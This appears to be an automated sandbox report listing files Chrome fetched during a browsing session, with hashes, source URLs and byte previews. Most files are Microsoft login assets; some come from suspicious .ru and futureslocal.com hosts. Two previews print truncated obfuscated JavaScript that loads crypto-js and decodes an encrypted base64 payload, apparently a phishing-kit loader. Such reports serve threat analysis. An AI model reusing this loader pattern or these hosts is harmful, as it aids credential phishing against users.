                                                                                  Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):96
                                                                                  Entropy (8bit):5.220277803943091
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:iuh72iczBra82yFsJFouMo+q6mgqWLsnk:NciczBdTFsJFoM+q6Mk
                                                                                  MD5:46520767C8D53BEFDB7688E66411794F
                                                                                  SHA1:964DB4925CE2A3D3C74329F9E7DE422EAB1CB4C0
                                                                                  SHA-256:2A3BB51F716E053996B41395A6E2F4F49419754C324C02C6693BAFD449867E3D
                                                                                  SHA-512:59ED863313B71B668AC6A6516162A07AC01F1E882747171F555592DE64B2D0DEB8A9CFA29BF014A1D23147D760EA573295A9C4E829BA6AF3708CC3BE3B78CF19
                                                                                  Malicious:false
                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSFwmCAmly1gHbXRIFDdFbUVISBQ1Xevf9?alt=proto
                                                                                  Preview:CkYKDQ3RW1FSGgQIVhgCIAEKNQ1Xevf9GgQISxgCKigIClIkChpAISMuKiQtXyslJj8vPV4pKCw6O34nPCJcXRABGP////8P
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (1349), with CRLF line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):1990
                                                                                  Entropy (8bit):5.969856051251849
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:k7bxxaG2PT08OPVCDRDh40YMuFnwhuIGC3JKfP:k5xaGGT5DRDpCFn8uIGMKfP
                                                                                  MD5:FB2DF93BD1FDC6B3A373999D2D84896A
                                                                                  SHA1:28BE8B5F8EEAF0D812903DA120A16C2F9AD2982D
                                                                                  SHA-256:F2A1D3771304A224DAC143ACFC1851D9C870B71372C7E1EC78BCCEC92BC7DCFE
                                                                                  SHA-512:0ECCB0710BE20AF1821BC85997CAE9A8ED57F2296EC52BBE681E495874C3ABE6D8E02D35E4EFB3E9D0A8F4DFAD0B8024E5E7F732C879CBBF2BE21D78480F34D8
                                                                                  Malicious:false
                                                                                  URL:https://futureslocal.com/res444.php?2-68747470733a2f2f375838782e6469676974616c766f796167652e72752f786178622f-scorpion
                                                                                  Preview: var gWfDjueUnUhylhOK = document.createElement("script");..gWfDjueUnUhylhOK.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(gWfDjueUnUhylhOK);..gWfDjueUnUhylhOK.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoiMHBGOGtCM3hNT3k2TU85Qk1SVW5RWlZTbzY5WXFNM1lDY1wvQ1hCM3FsOVg4V28rMkhzZjBMSVJkR0xxK2ZrWmtmTXBlZDNjNHVES01lTGlnWUwzNXZjTmgrSG42VVwvbXpqSVZJaU9TRnA1MmZvRkF2VlpxVFYwWVwvbE1cL2dEdUFROER3Um5BZkZ3WCs3V1J2ZEJzQ3dHVUZrXC8yT0duRDJnaE9JZ3N3Y2srTFR5dzNaVHhxdUJjZXhWd29yRzIzeHlTRmJBM1VHN2puYys1TlgwZ0M3RzRTeDZiY0d3Wk5OTVdrTDQwRVFXQ0M3RFp5a2s1TjhWMVwvTU1hVDhLYWFFQmZQK0tqazgxUFdmeUppSGZTZ2xFYmo2RTErdFZ6TzY3U2tMbEF1ekpNeUVDOWlkVTEwK1pVTTJUVkJXbVhcL2FDV0J1MG1rMnNxcUtBZkhKdnlWV1I5MnM0cDZnbDNlelwvbHlZcjJOVDJzUkxuSDI5MnR0aTVjRlFRSkNDWlBtVllVbG1tdlRCSkttOFd4elg3UWllUDBITmZ1eFU5YytPVVFQeFlmRmgxM3Byb3BcL29KanFiK0pUYmViKzdvY1lcL1MxbmlDSWZqMnVoanZFQkZVZ3VzOFEzcHdXODh6QldxNjlpenpmbVpYS1o0bmVNSytxTnJ4dTNpZDRKRG0zNm9JRFpjeTAxMT
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:very short file (no magic)
                                                                                  Category:downloaded
                                                                                  Size (bytes):1
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:U:U
                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                  Malicious:false
                                                                                  URL:https://nrghswqujii9u953lt6vji9kd6xexuj3autugc7kuuwisdl5vycxdguirpd.expritraw.ru/tptlykbbjyrpxzwekcoUjUvVlZQLDEXIGMPVUGOILAXMMANLVDNEEIONYXUKFUINWCZJYGPCVWQ
                                                                                  Preview:1
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (1341), with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1982
                                                                                  Entropy (8bit):5.9679611118421025
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:Y7bHnhcbDMQfIztRCPXWgEvTS8LuICwUa:YPnhcXMztsuNfLuIt
                                                                                  MD5:75BFB25D4D90F6AA0A3F9A9191889C24
                                                                                  SHA1:9BB37230509ED4D3D85BA6304F7647CA504831E2
                                                                                  SHA-256:769CCD9162623E43DF41CE5140F45284286539FABAF978065753701AEC0A1B8E
                                                                                  SHA-512:F42683918908BE946E1D292E53829F16BBD40736D2C4329F8521EE65CF1D6402D3870420A94298CAE48EAD21BEFF83D5424B3AE0E38DF5A3FCC38DB82FEE39CD
                                                                                  Malicious:false
                                                                                  Preview: var JJnXHBoiiQdUGCLH = document.createElement("script");..JJnXHBoiiQdUGCLH.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(JJnXHBoiiQdUGCLH);..JJnXHBoiiQdUGCLH.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoiQkp1MUVmNXA5SVlrckg2anRpTTdWK2J1ek5hWHpremtaSlpIMmFJbG5YSmZad2pEWkpnS0x6OTV4S0RBZ2FIMWpEWk05N3VRSjBDVFN0dEJrTTdUZXFjVnlCSUJET3hndm0zN3MwT0UwVHN5bXQ1K2hsK2tkWE5RSnQ3SEVySXBSTzNcL1lZOUp0UGtna0dUMk1QZW84VlF1bEg4dnFXdEMrQ29HYWlVU3ZVa1J1OFpUWjR0V3FzT2tjd0xhNkord2FqTkJzUUhmUGJkSlwvWWw2aWx4ODNYeEdObTBMWGgyWFwvTmpOcXlueWNSR2ZaQnZLTkMrZFNlckh4ZEFPNytrcjZJWHhxbWJXdGlhellHWWZldVhzMkU0OFRTZXU3dkE0R0NTWkk0Z3R5T01yS1V3SzJcL3VYZ0I5dmdhajdkSE5ycXBYQTRENm5aazR2WHlVVW5IVGN5Qk9sVWZVRWVzNk5Dc2gxWDYwbXFkSEpMd3Z1NnJWY1QzaXcrM2QxVlZwaFhxR1lNeHVuZ0NwTGk5cWlqUWJwb3FOZnBETjJEXC9QaVNiZ2c1ellzdlhFaXh5QWsyS1lEQVEyb29obTNxZHhnRWt2N01YNWlkczI4cUE0XC8zakVTOGpBbm9vZ3pGYTd4TFg2cGZaV3lpd2s5Z0g4Mng2THQyY2NRMFZkWlJCSGQ2NTdWQkYrTHZIZk
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                                                  Category:downloaded
                                                                                  Size (bytes):20410
                                                                                  Entropy (8bit):7.980582012022051
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:8RvmaMFysnOXZ2m9zM+udO6GGUpeAU02oDGnN5EsQwWUQGTS8r2k:8pmm7ZFM+ObGGUIjN5PJV3Tp
                                                                                  MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                                                  SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                                                  SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                                                  SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                                                  Malicious:false
                                                                                  URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                                                  Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:GIF image data, version 89a, 352 x 3
                                                                                  Category:downloaded
                                                                                  Size (bytes):2672
                                                                                  Entropy (8bit):6.640973516071413
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                  MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                  SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                  SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                  SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                  Malicious:false
                                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                                                  Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                                  Category:dropped
                                                                                  Size (bytes):5525
                                                                                  Entropy (8bit):7.961202222662501
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                                  MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                                  SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                                  SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                                  SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                                  Malicious:false
                                                                                  Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                                  Category:downloaded
                                                                                  Size (bytes):35170
                                                                                  Entropy (8bit):7.993096534744333
                                                                                  Encrypted:true
                                                                                  SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                                                  MD5:171A4DD9400708B88724B57D62B24A6A
                                                                                  SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                                  SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                                  SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                                                  Malicious:false
                                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_cc2c59f5ef2c09e14b08.js
                                                                                  Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57510
                                                                                  Category:downloaded
                                                                                  Size (bytes):16345
                                                                                  Entropy (8bit):7.98960525258912
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:hOBEj/gTOkWow6mhJqXnYI/0PiQBSoe122Yw/:hOBKJBXO586QB+11J
                                                                                  MD5:187B9EBA41FDF66B2C8F7EB645D2BC17
                                                                                  SHA1:B1C034F7F5F754F271D094FB417B9A820C1F712C
                                                                                  SHA-256:CA0FBF8421A0CF4CCDA7310B2AE74CBD92214901EC2D0F273EA3B07F12CF96EA
                                                                                  SHA-512:0D7FB682D24E97C9E3FC04AA87CCB8EC508CA0CF197DA0617EFFD981BC8B5E3600824FDD08F1F31F59D276B5BF53229D00805D984E01D512FD968610C5FE9609
                                                                                  Malicious:false
                                                                                  URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js
                                                                                  Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                  Category:dropped
                                                                                  Size (bytes):673
                                                                                  Entropy (8bit):7.6596900876595075
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                  MD5:0E176276362B94279A4492511BFCBD98
                                                                                  SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                  SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                  SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                  Malicious:false
                                                                                  Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:GIF image data, version 89a, 352 x 3
                                                                                  Category:downloaded
                                                                                  Size (bytes):3620
                                                                                  Entropy (8bit):6.867828878374734
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                  MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                  SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                  SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                  SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                  Malicious:false
                                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                                                  Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                  Category:dropped
                                                                                  Size (bytes):17174
                                                                                  Entropy (8bit):2.9129715116732746
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                  MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                  SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                  SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                  SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                  Malicious:false
                                                                                  Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                                  Category:dropped
                                                                                  Size (bytes):116343
                                                                                  Entropy (8bit):7.997640489040715
                                                                                  Encrypted:true
                                                                                  SSDEEP:3072:s8ovOS/D3L+TGsLMet6+iNLTMMqfC4hyFv0As5:jNSrij/t6+aAMqfCoydM5
                                                                                  MD5:3063B0DA40B45B46602FCE99AC53D315
                                                                                  SHA1:57883FF854B80AD2A76479A0273BE9218B4DA553
                                                                                  SHA-256:C60FB365DF08D31F36EDA468941C309AE3A917ED784A30495800F05E5F98B66B
                                                                                  SHA-512:3EAF55117A825B588972F6AE324F6173EF4F2A309BAB69A9A6CC43C8F9A4EE25C2FA86752C8912542CC353727DC54A034B369D4A4451F0C3B20206C16FA9FE98
                                                                                  Malicious:false
                                                                                  Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,.......X.?......-....J.....I.;....t..FSw...a7i...c..Y{.-..>a..4h.Eo..c#...O....~..d....Z..z.'...s.D..E...jb.O.F..0.VW>..]%6........x..O>E.'a0U.....w....."..9.az.6....<a.?..<qvx........ct.K..s.C3..d#..#^R.z..A..u.f..........s.....M.rb(.\v.....%.k....i.f...,C.s..bY..K#...~.>..D..j....m.71..}...37h........P{..7!@...|..ZR.]V....."...0.o....7..peCG....px..j.%r2.....R.k5m..s.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (47520)
                                                                                  Category:downloaded
                                                                                  Size (bytes):47521
                                                                                  Entropy (8bit):5.398500199255723
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:11CQfmIG2Y8rH8zH5ei80aszzQhpd+dr6F/PG2Xv9PL79noBL5o6YBU91KL5Gc05:1a/0H8zH5eJdVplGYv9f96Yjy
                                                                                  MD5:301F68F3D8317AB22D4021E266C9A853
                                                                                  SHA1:B464B8B48880C53E9D203A2ACEAF3FDFEC517D97
                                                                                  SHA-256:BF2059BE7007CD21FDD3B5DF727B89C8916142F7ABADFD46408DE17778699FB7
                                                                                  SHA-512:1B2C5CABA6A54F6884E8DC40CB31FFDAA56DD3833DE8F97F0843811617207D1DF0ECEF75E9B88F652D42731E6784F6F51A7021FBB1515738DC5DE8E4B90A5682
                                                                                  Malicious:false
                                                                                  URL:https://challenges.cloudflare.com/turnstile/v0/g/849bfe45bf45/api.js
                                                                                  Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
